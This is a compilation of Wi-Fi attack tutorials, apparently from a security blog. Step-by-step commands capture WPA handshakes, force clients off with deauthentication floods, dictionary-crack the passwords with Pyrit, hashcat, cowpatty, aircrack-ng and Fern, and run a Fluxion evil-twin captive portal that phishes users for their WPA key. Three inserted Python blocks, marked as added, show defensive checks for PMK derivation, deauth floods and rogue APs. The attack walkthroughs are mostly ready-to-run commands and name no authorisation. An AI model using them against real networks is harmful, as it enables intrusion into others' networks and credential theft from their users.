3 Ways to Crack Wifi using Pyrit, oclHashcat and Cowpatty

First, start monitor mode on our wireless adaptor.

airmon-ng start wlan0

Monitor mode is now enabled on an interface named wlan0mon.

Then start listening to all the available wifi connections with the following command:

airodump-ng wlan0mon

After running the above command it will start listening to all the wifi traffic nearby, so wait till your target appears and then hit Ctrl+C.

Now we have to listen on the specific channel on which the target is present. Run the command:

airodump-ng -c 2 --bssid 3C:1E:04:XX:XX:XX --write sommay wlan0mon

-c == channel number of the target (2 in my case, see the CH column)

--bssid == MAC address of the target AP

--write == name (prefix) of the capture file

Now wait till the WPA handshake is captured and then hit Ctrl+C.

A file named sommay-01.cap will now have been generated.

PYRIT

The first method to crack the password from the capture file is Pyrit. We will use a dictionary attack, so run the command:

pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough

-i == path to the input file (in our case the dictionary)

-r == path to the capture file (in our case sommay-01.cap)

attack_passthrough == specifies that a dictionary attack is to be performed

As you can see it has successfully cracked the password.

OCLHASHCAT

First of all download oclHashcat from its official website: https://hashcat.net/files/hashcat-2.00.7z

First we have to convert the .cap file we captured with airodump-ng to .hccap with aircrack-ng, using the command:

aircrack-ng sommay-01.cap -J sommay-01

-J == path to the output file, which gets the extension .hccap

Now copy the dictionary you want to use into the hashcat folder, enter that folder and run the command:

./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst

If you are on a 32-bit system, replace 64 with 32 in the above command.

-m is the hash type, which is 2500 for WPA/WPA2 cracking

Then give the path to the .hccap file you converted with aircrack-ng, followed by the name of the dictionary file. As you can see it has successfully cracked the password.

COWPATTY

For cracking with the help of cowpatty we first have to generate the hash file specific to the target AP. For this we will use genpmk, so run the command:

genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY

-f == path to the dictionary file

-d == name of the output dictionary

-s == ESSID (name) of the target AP (it must be identical to the target AP's name)

It will now generate a dictionary file named cowpatty_dict, which will speed up the cracking process.

Now run the command:

cowpatty -d cowpatty_dict -r sommay-01.cap -s SOMMAY

-d == path to the dictionary we generated with genpmk

-r == path to the capture file we generated with airodump-ng

-s == ESSID of the target AP (it must be identical to the target AP's name)
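As an added illustration (not part of the original post) of why genpmk's -s must be the exact ESSID: the WPA/WPA2-Personal PMK is PBKDF2-HMAC-SHA1 of the passphrase salted with the network name, so a table precomputed for one ESSID says nothing about another, which is why a non-default SSID and a long passphrase are the defender's levers here. The SSID and passphrase strings below are constructed; the one fixed value is the published IEEE 802.11 test vector.

```python
import hashlib

# Published IEEE 802.11 test vector: passphrase "password", SSID "IEEE"
IEEE_VECTOR_PMK = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal Pairwise Master Key:
    PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 iterations, 32 bytes).
    This is the per-word computation genpmk performs; the ESSID is the salt,
    which is why -s has to be the exact network name."""
    if not (8 <= len(passphrase) <= 63) or not passphrase.isascii():
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def matches_ieee_vector() -> bool:
    """Sanity check of derive_pmk against the standard's test vector."""
    return derive_pmk("password", "IEEE").hex() == IEEE_VECTOR_PMK

def pmk_is_ssid_bound(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """True when the same passphrase gives different PMKs under two ESSIDs:
    a table precomputed for ssid_a is useless against a network named ssid_b."""
    return derive_pmk(passphrase, ssid_a) != derive_pmk(passphrase, ssid_b)

if __name__ == "__main__":
    # Constructed names: "SOMMAY" and "sommay" differ only in case, yet give
    # unrelated PMKs, so the -s argument must match the ESSID byte for byte.
    print(matches_ieee_vector())                                          # → True
    print(pmk_is_ssid_bound("correcthorsebattery", "SOMMAY", "sommay"))   # → True
```

The 4096 PBKDF2 iterations are also what makes every dictionary guess expensive, so a passphrase outside common wordlists pushes the attack from minutes to infeasible.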

Author: Himanshu Gupta is an Information Security Researcher | Technical writer. You can follow him on LinkedIn.

Crack Wifi Password using Aircrack-Ng (Beginner’s Guide)

This is the classical method of wireless password cracking. All the tools use this method in one way or another.

First start monitor mode, which will listen to all the wifi connections nearby, with the command:

airmon-ng start wlan0

In the lower right corner you will see: monitor mode enabled for [phy1]wlan0mon

Now confirm that our wifi adaptor is in monitor mode by running:

ifconfig

which will show the wifi adaptor as wlan0mon, meaning the adaptor is in monitor mode.

Now run the command:

airodump-ng wlan0mon

The above command will start listening to all the available wifi connections.

When your target appears, hit Ctrl+C and then capture the handshake with the command:

airodump-ng -c 7 --bssid C8:XX:35:XX:FD:F0 --write 1 wlan0mon

Here,

-c is the channel number of the AP, listed in the CH column of the output of the previous command; in my case it is 7.

--bssid is the MAC address of the target AP; in my case the AP is rajlab and its BSSID is C8:3A:XX:44:XX:F0

--write is the capture file in which the captured packets will be saved; in my case I have named it 1

Option    Description
-c        The channel for the wireless network
--bssid   The MAC address of the access point
-w        The file name prefix for the file which will contain the authentication handshake
mon0      The wireless interface

Now start the deauth attack to disconnect all the clients connected to that AP, which will help in capturing the handshake, with the command:

aireplay-ng -0 100 -a XX:3A:35:XX:FD:F0 -e rajlab wlan0mon

Here,

-0 is used for the deauth attack

100 is the number of deauth packets to be sent

-a is the target AP MAC address

-e is the ESSID of the target AP, i.e. the name of the target AP

After launching the deauth attack we will see the WPA handshake in the top right corner of the previous terminal window; then hit Ctrl+C.
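Added example, not from the original post: the defender's view of the step above. Forged deauthentication frames arrive as a burst carrying the AP's own address in the transmitter field, and a rate check over monitor-mode management frames catches exactly that; the frame bytes, timestamps and MAC addresses here are constructed.

```python
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC, BEACON = 0x0C, 0x0A, 0x08   # 802.11 management subtypes

def parse_mgmt_frame(frame: bytes):
    """Return (subtype, transmitter MAC, reason code) for a management frame,
    or None for anything else. Address 2 is the transmitter; in a forged
    deauth it is the spoofed AP address, not the attacker's own card."""
    if len(frame) < 24 or frame[0] & 0x0F != 0:   # version 0, type 0 only
        return None
    subtype = frame[0] >> 4
    addr2 = ":".join(f"{b:02x}" for b in frame[10:16])
    reason = None
    if subtype in (DEAUTH, DISASSOC) and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]
    return subtype, addr2, reason

def detect_deauth_flood(frames, window=10.0, threshold=10):
    """frames: iterable of (timestamp, raw 802.11 frame). Returns sorted
    (transmitter, peak count) pairs for transmitters that sent at least
    `threshold` deauth/disassoc frames within any `window` seconds."""
    recent, peaks = defaultdict(deque), {}
    for ts, raw in frames:
        parsed = parse_mgmt_frame(raw)
        if not parsed or parsed[0] not in (DEAUTH, DISASSOC):
            continue
        q = recent[parsed[1]]
        q.append(ts)
        while ts - q[0] > window:          # drop frames older than the window
            q.popleft()
        if len(q) >= threshold:
            peaks[parsed[1]] = max(peaks.get(parsed[1], 0), len(q))
    return sorted(peaks.items())

def mgmt_frame(subtype, dst, src, bssid, reason=None):
    """Assemble a minimal management frame header (+ reason) as sample data."""
    hdr = bytes([subtype << 4, 0]) + b"\0\0" + dst + src + bssid + b"\0\0"
    return hdr if reason is None else hdr + struct.pack("<H", reason)

AP, STA, BCAST = bytes.fromhex("020000000001"), bytes.fromhex("020000000002"), b"\xff" * 6
# Constructed capture: one beacon, then 100 broadcast deauths within a second
# that claim to come from the AP (reason code 7), then one ordinary deauth
# from a client that is simply leaving the network (reason code 3).
SAMPLE = [(0.0, mgmt_frame(BEACON, BCAST, AP, AP))]
SAMPLE += [(0.5 + i * 0.01, mgmt_frame(DEAUTH, BCAST, AP, AP, 7)) for i in range(100)]
SAMPLE.append((5.0, mgmt_frame(DEAUTH, AP, STA, AP, 3)))

if __name__ == "__main__":
    print(detect_deauth_flood(SAMPLE))   # → [('02:00:00:00:00:01', 100)]
```

Detection tells you a network is being hit; what stops clients from honouring the forged frames is Management Frame Protection (802.11w), which authenticates deauth and disassoc frames.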

Now we have to crack the password with aircrack-ng, so type the command:

aircrack-ng 1-01.cap -w /usr/share/nmap/nselib/data/passwords.lst

Here,

1-01.cap is the capture file we generated with airodump-ng.

-w is the dictionary to be used to perform the dictionary attack

In my case the key is found as KEY FOUND! [raj123987]


Cracking WiFi Password using Fern WIFi Cracker

Fern Wifi Cracker is a wireless security auditing and attack program written in Python with the Python Qt GUI library. It is able to crack and recover WEP/WPA/WPS keys and also run other network-based attacks on wireless or Ethernet-based networks.

Fern comes preinstalled in Kali Linux, so go to Applications, then to Wireless attack, and click on Fern WiFi Cracker.

Now click on Select Interface and select the wireless interface, which will put it into monitor mode to listen to all the wifi APs nearby. Then click on Scan for Access Points.

After scanning it will show the WEP- and WPA-secured wifi networks separately; in my case there is no WEP, so it is showing 5 WPA-secured networks. Click on the WPA tab.

It will now show all the WPA networks. Select your target by clicking on it; in my case I have selected ttpl as my target. Now select a dictionary by clicking on BROWSE in the lower right hand corner.

Select your dictionary from your system. I have selected nmap.lst from the /usr/share/wordlists/ directory and then clicked Open. (YOU CAN USE YOUR CUSTOM MADE WORDLIST OR ANY OTHER)

Now select Regular Attack and then click on WIFI ATTACK in the top right hand corner.

It will prompt with WPA ATTACK REQUIREMENT, as at least 1 client is required to be connected to the target AP, so click OK.

Clicking OK starts the attack: it first deauthenticates the client, then captures the handshake, and then breaks the encryption, which will recover the password if it is present in your dictionary. In my case it has successfully found my password as WPA KEY:rajchandel12345


Hack Wi-Fi using Social Engineering with Fluxion (Evil Twin Attack)

Fluxion is a remake of linset by vk439 with fewer bugs and more features. It is compatible with the latest release of Kali (Rolling).

How it works

  • Scan the networks.
  • Capture a handshake (the attack can't be used without a valid handshake; it's necessary to verify the password).
  • Use the web interface.
  • Launch a fake AP instance to imitate the original access point.
  • Spawn an MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the fake AP and enter the WPA password.
  • A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script.
  • A captive portal is launched in order to serve a page which prompts the user to enter their WPA password.
  • Each submitted password is verified against the handshake captured earlier.
  • The attack terminates automatically as soon as a correct password is submitted.

First of all clone Fluxion from GitHub with the command:

git clone https://github.com/deltaxflux/fluxion.git

And execute the script from its folder with the command:

./fluxion

After starting, it will ask you to choose the interface, so select wlan0 by entering 1. It will then ask you to select the channel on which to listen for wifi connections, so enter 1 to listen to all wifi connections.

It will open a new window for wifi monitoring, so wait till your target appears and hit Ctrl+C.

It will now show the list of available targets, so select the target by entering the id number of that connection; in my case I selected ttpl by pressing 2.

Now select option 1 to create the fake AP (access point) and press ENTER.

Now press ENTER to skip, and then select 1 to choose aircrack-ng from the handshake checking options.

Now select option 1 to deauthenticate all clients connected to the target wifi.

After selecting 1 it will open 2 windows, one for capturing the WPA handshake and the other for deauthenticating all clients. Now enter 1 in the MENU window to check the handshake, without closing the other windows.

After checking the handshake it will ask you to choose the web interface, so select 1 and press ENTER.

It will then ask you to choose the language, so select 1 for ENGLISH and press ENTER.

It will now open 4 windows, starting the fake AP and deauthenticating the clients of the wifi network.

The fake AP is now running: the clients will not be able to connect to the original wifi and will be forced to connect to our fake AP, and when a client opens a browser it will be redirected to a login page asking for the WPA password.

When the user enters the correct WPA password all the attacks are stopped and the password is shown, in my case KEY FOUND [rajchandel12345]. (THE ATTACKS WILL ONLY STOP WHEN THE CLIENT ENTERS THE CORRECT PASSWORD)
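An added example (not from the original post or from Fluxion) of the defensive counterpart: a check over scan results that flags an AP reusing a managed ESSID from an unauthorised BSSID, together with the typical evil-twin signature of an open network standing in for one the real AP serves with WPA/WPA2. The scan rows, BSSIDs and allowlist are constructed.

```python
# Constructed scan rows in the shape a WIDS sensor or airodump-ng would
# report: (ESSID, BSSID, channel, security). Not from the original post.
SCAN = [
    ("ttpl",   "02:00:00:00:aa:01", 6,  "WPA2"),  # the real AP
    ("ttpl",   "02:00:00:00:bb:02", 6,  "OPN"),   # same name, open, unknown BSSID
    ("rajlab", "02:00:00:00:cc:03", 11, "WPA2"),  # another managed network
    ("guest",  "02:00:00:00:dd:04", 1,  "OPN"),   # not ours, ignored
]

# Authorized BSSIDs per managed ESSID (constructed allowlist)
AUTHORIZED = {
    "ttpl":   {"02:00:00:00:aa:01"},
    "rajlab": {"02:00:00:00:cc:03"},
}

def find_evil_twins(scan, authorized):
    """Flag APs advertising a managed ESSID from a BSSID not on the allowlist.
    Each finding carries the indicators that match the captive-portal pattern
    described above: an unknown BSSID reusing our network name and, usually,
    an open network in place of one the legitimate AP protects with WPA/WPA2
    (the portal needs clients to be able to join without a key)."""
    legit_security = {essid: sec for essid, bssid, _ch, sec in scan
                      if bssid in authorized.get(essid, ())}
    findings = []
    for essid, bssid, ch, sec in scan:
        if essid not in authorized or bssid in authorized[essid]:
            continue
        indicators = ["unauthorized BSSID reusing managed ESSID"]
        if sec == "OPN" and legit_security.get(essid, "OPN") != "OPN":
            indicators.append("open network impersonating a WPA/WPA2 one")
        findings.append({"essid": essid, "bssid": bssid, "channel": ch,
                         "indicators": indicators})
    return findings

if __name__ == "__main__":
    for finding in find_evil_twins(SCAN, AUTHORIZED):
        print(finding)   # → one finding for 02:00:00:00:bb:02 with both indicators
```

On the client side the same mismatch is what a supplicant profile pinned to WPA2 prevents: a station configured for a protected "ttpl" will not auto-join an open network of that name.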
